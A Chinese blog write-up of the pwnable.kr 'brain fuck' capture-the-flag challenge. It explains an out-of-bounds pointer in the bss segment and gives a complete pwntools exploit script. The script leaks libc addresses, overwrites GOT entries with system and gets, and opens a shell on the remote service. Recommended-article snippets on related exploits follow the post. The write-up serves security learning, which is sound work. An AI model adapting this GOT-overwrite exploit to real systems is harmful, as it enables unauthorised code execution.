pwnable brain fuck(bss段的用途)

最新推荐文章于 2025-05-21 10:28:52 发布
原创 最新推荐文章于 2025-05-21 10:28:52 发布 · 730 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入探讨了在Pwn竞赛中利用控制指针修改got表的技巧,通过具体实例讲解如何泄露和修改函数地址,最终获取shell。适用于对Pwn攻防感兴趣的读者。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目链接传送门
这里题目跟网鼎杯线下赛的一个pwn有些相似。
输入一些字符可以控制一个指针,可以向这个指针指向的地址处写数据。
在这里插入图片描述
首先要知道bss段里面有什么。
在这道题里面的p指针的更高地址处是stdin,stdout,stderr然后是函数的got表,这里可以控制指针p泄露和修改got表。

#coding=utf-8
from pwn import *

p=0x0804a0a0
putchar=0x804a030
jmp=0x8048671

debug=0
if debug: 
	p=process("bf")
	elf=ELF("bf")
	libc=ELF("bf_libc.so")
	context.log_level="debug"
else:
	p=remote("pwnable.kr",9001)
	elf=ELF("bf")
	libc=ELF("bf_libc.so")
	context.log_level="debug"




p.recvuntil("type some brainfuck instructions except [ ]\n")
payload="."
payload+="<"*(112-4)+"<."*4+"<"#leak putchar
payload+=">,"*4+"<"*36+">,"*4  #reset puts,fgets
payload+="<"*4+'>'*28+'>,'*4+'.' #reset  memset

p.sendline(payload)
p.recv(1)#这里是为了调用put函数向got表中写入真实地址

puts_addr=u32(p.recv(4)[::-1])
print "puts_addr="+hex(puts_addr)


system_addr=libc.symbols["system"]+puts_addr-libc.symbols["putchar"]
p.send(p32(jmp))
print "system_addr="+hex(system_addr)
print hex(elf.got["putchar"])
gets_addr=libc.symbols["gets"]+puts_addr-libc.symbols["putchar"]
print "gets_addr="+hex(gets_addr)
p.send(p32(system_addr))
p.send(p32(gets_addr))


p.recvuntil("type some brainfuck instructions except [ ]\n")
p.sendline("/bin/sh\x00")

p.interactive()

需要注意的是这里的result = putchar(*(char *)p);函数好像直接复写它的got表就行了,但实际上这里的p
是一个字符,并不是一个指针

.text:0804863A                 mov     eax, ds:p       ; jumptable 080485FC case 46
.text:0804863F                 movzx   eax, byte ptr [eax]
.text:08048642                 movsx   eax, al
.text:08048645                 mov     [esp], eax      ; c
.text:08048648                 call    _putchar

所以让程序回到开始出再运行一遍获取到shell。

(BUUCTF)pwnable_bf
xy1458214551的博客
01-12 456
BUUCTF的pwnable_bf题解
pwnablebrainfuck
pwd_3的博客
09-29 517
问题分析程序没有对p的访问空间做限制,导致可以任意内存读写,在.bss前面是存放got的地方。基本思路是:先读取got中的值泄露libc地址,再根据bf_libc.so计算其他函数偏移。接下来是写,覆盖原有got值为指定函数地址来getshell遇到问题最开始想覆盖putchar的got值为system的地址,但无法控制system的参数。思维僵化 真的是,怎么就没想到覆盖成__start的地址,
深入理解BSS与HTML布局:bss-master项目解析
最新发布
weixin_42620563的博客
05-21 563
BSS(Block Started by Symbol)是程序内存中用于存储静态变量和全局变量的空间,且初始值默认为零。这一概念源自于早期计算机体系结构,其中对于内存的分配和管理至关重要。
pwn训练 pwnable.kr brainfuck
doudoudedi
09-08 404
这是一道pwnable第二模块的题目 这道题开始看不懂emem,发现是一个brainfuck的解释器发现有对内存可以读写控制的函数还有一个野指针emem就是他了开始发现只要把memset函数覆写成为gets然后输入/bin/sh再是将fgets覆写成为system 第一步泄露putchar函数的真实地址然后算出libc基址 计算出system,gets的地址 在将putchar写成main 然后就...
pwnable 笔记 Rookiss - brain fuck - 150 pt
HiTaQini
12-15 3152
终于打到第二关了... 这题考察GOT覆写
pwnable.kr】 brainfuck
weixin_30530523的博客
08-03 196
pwnable.kr第二关第一题: ========================================= Download : http://pwnable.kr/bin/bfDownload : http://pwnable.kr/bin/bf_libc.so Running at : nc pwnable.kr 9001 =======================...
pwnable.kr - brain fuck
加号减减号的博客
03-06 930
题目简介 分析 writeup 题目简介 Brain fuckpwnable.kr 第二阶的第一道题,考察了覆些 GOT 表等知识点。题目信息如下: 分析 将下载得到的 bf 文件拖进 IDA 中查看,发现程序主要由 main 函数以及 do_brainfuck 函数组成,且没有开启 PIE。 main 函数如下: int __cdecl main...
pwnable BrainFuck,GOT表重写
nibiru_holmes的博客
03-10 1260
题目链接:http://pwnable.kr/play.php BrainFuck是什么鬼,百度一下..... Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。 其实就是闲着没事做出来的一种语言。 看看
PWN · ret2text | ‘/bin/sh‘写在bss】[HNCTF 2022 Week1]ezr0p32
Mr_Fmnwon的博客
06-10 1838
比较简单,也比较老套,所以更应该记住。
什么是bss
热门推荐
bobocheng的专栏
02-23 3万+
一个程序本质上都是由 bss、data、text三个组成的。这样的概念,不知道最初来源于哪里的规定,但在当前的计算机程序设计中是很重要的一个基本概念。而且在嵌入式系统的设计中也非常重要,牵涉到嵌入式系统运行时的内存大小分配,存储单元占用空间大小的问题。    在采用式内存管理的架构中(比如intel的80x86系统),bss(Block Started by Symbol segme
bss
博客模版
06-20 5061
可执行程序包括BSS、数据、代码(也称文本)。 BSS(Block Started by Symbol)通常是指用来存放程序中未初始化的全局变量和静态变量的一块内存区域。 注意和数据的区别,BSS存放的是未初始化的全局变量和静态变量,数据存放的是初始化后的全局变量和静态变量。 UNIX下可使用size命令查看可执行文件的大小信息。如size a.out。   在采用式内存管理的架
BrainFuck 以及运用(idf)
dichunting8344的博客
06-13 524
由于这是第二次遇见了,所以在博客里分享一下,以后用的找着,话不多说,进入正题,百度之,Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。它的主要设计思路是:用最小的概念实现一种“简单”的语言,BrainF**k 语言只有八种符号,所有的...
[Black Watch 入群题]PWN(栈迁移到bss
qq_33590156的博客
08-04 870
from pwn import * from LibcSearcher import * context(os='linux',arch='i386',log_level='debug') ms = remote('node3.buuoj.cn',25353) #ms = process("./spwn") elf = ELF('./spwn') bss_addr = 0x0804A300 lea_ret = 0x08048408 write_plt = elf.plt['write'] write_
BSS
longtype的博客
02-23 1万+
(深入理解计算机系统) bss,data、text、堆(heap)和栈(stack) 1 关于BSS的大小 2 1. BSS中的内容 2 2.BSS在加载运行前的处理 3 3.BSS的作用 3 4. 代码优化对BSS的影响 3 5.Linux 下查看属性的指令: 4 BSS大小实验 4 清除BSS的一般做法 6 link脚本一般包含类似语句: 6   (深...
终于知道什么叫BSS
01-04 2万+
是“Block Started bySymbol”的缩写,意为“以符号开始的块”。   BSS是Unix链接器产生的未初始化数据。其他的分别是包含程序代码的“text”和包含已初始化数据的“data”BSS的变量只有名称和大小却没有值。此名后来被许多文件格式使用,包括PE。“以符号开始的块”指的是编译器处理未初始化数据的地方。BSS节不包含任何数据,只是简单的维护开始和结
linux程序分机制
01-20 683
终于知道什么叫BSS 是“Block Started by Symbol”的缩写,意为“以符号开始的块”。   BSS是Unix链接器产生的未初始化数据。其他的分别是包含程序代码的 “text”和包含已初始化数据的“data”BSS的变量只有名称和大小却没有值。此名后来被许多文件格式使用,包括PE。“以符号开始的块” 指的是编译器处理未初始化数据的地方。BSS节不包含任何
什么是BSS
heaiding的专栏
12-11 2751
<br />       今天学习IIC时,发现有清除BSS的功能代码,由于不知道什么是BSS,所以上网搜索相关知识,记录在此。<br />       BSS(Block Started by Symbol)这个词最初是UA-SAP汇编器(United Aircraft Symbolic Assembly Program)中的一个伪指令,用于为符号预留一块内存空间。该汇编器由美国联合航空公司于20世纪50年代中期为IBM 704大型机所开发。后来BSS这个词被作为关键字引入到了IBM 709和
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值